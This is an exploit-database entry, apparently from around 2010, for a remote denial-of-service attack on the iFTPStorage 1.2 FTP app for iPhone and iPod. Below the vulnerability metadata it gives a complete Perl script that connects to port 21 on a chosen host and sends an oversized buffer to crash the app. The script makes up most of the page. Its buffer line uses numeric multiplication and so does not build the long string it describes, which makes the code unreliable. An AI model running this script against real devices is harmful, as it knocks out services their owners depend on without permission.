iFTPStorage for IphoneIpod - Remote Dos Exploit

vendor:

iFTPStorage

by:

Ale46

7.5

CVSS

HIGH

Remote Denial of Service

CWE

Product Name: iFTPStorage

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: iPhone 3GS with 3.1.2 firmware

2010

iFTPStorage for IphoneIpod – Remote Dos Exploit

This exploit allows an attacker to remotely crash the iFTPStorage application on iPhone and iPod. By sending a large buffer of 'A' characters, the application crashes and becomes unresponsive.

Mitigation:

No known mitigation or remediation available.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#

# Exploit: iFTPStorage for Iphone\Ipod - Remote Dos Exploit

# Date: 20/02/10

# Author: Ale46

# Software Link:

# http://itunes.apple.com/us/app/iftpstorage/id333357690?mt=8

# Version: 1.2

# Tested on: Iphone 3GS with 3.1.2 firmware

# Note: iFTSTorage Lite is also vulnerable

# Greetz: Gandalf



use IO::Socket;



if (@ARGV<1){

        print ("Usage: ./iFTPStorage <server_ip>\n");

	exit();

}



my $host = $ARGV[0];

my $port = 21;

my $stuff = "A"*100000;

my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,

PeerPort => $port);

unless ($socket) { die "Can\'t connect to $host" }

print "Sending evil buffer..\n";

sleep(2);

print $socket $stuff;

sleep(2);

print "Crashed..";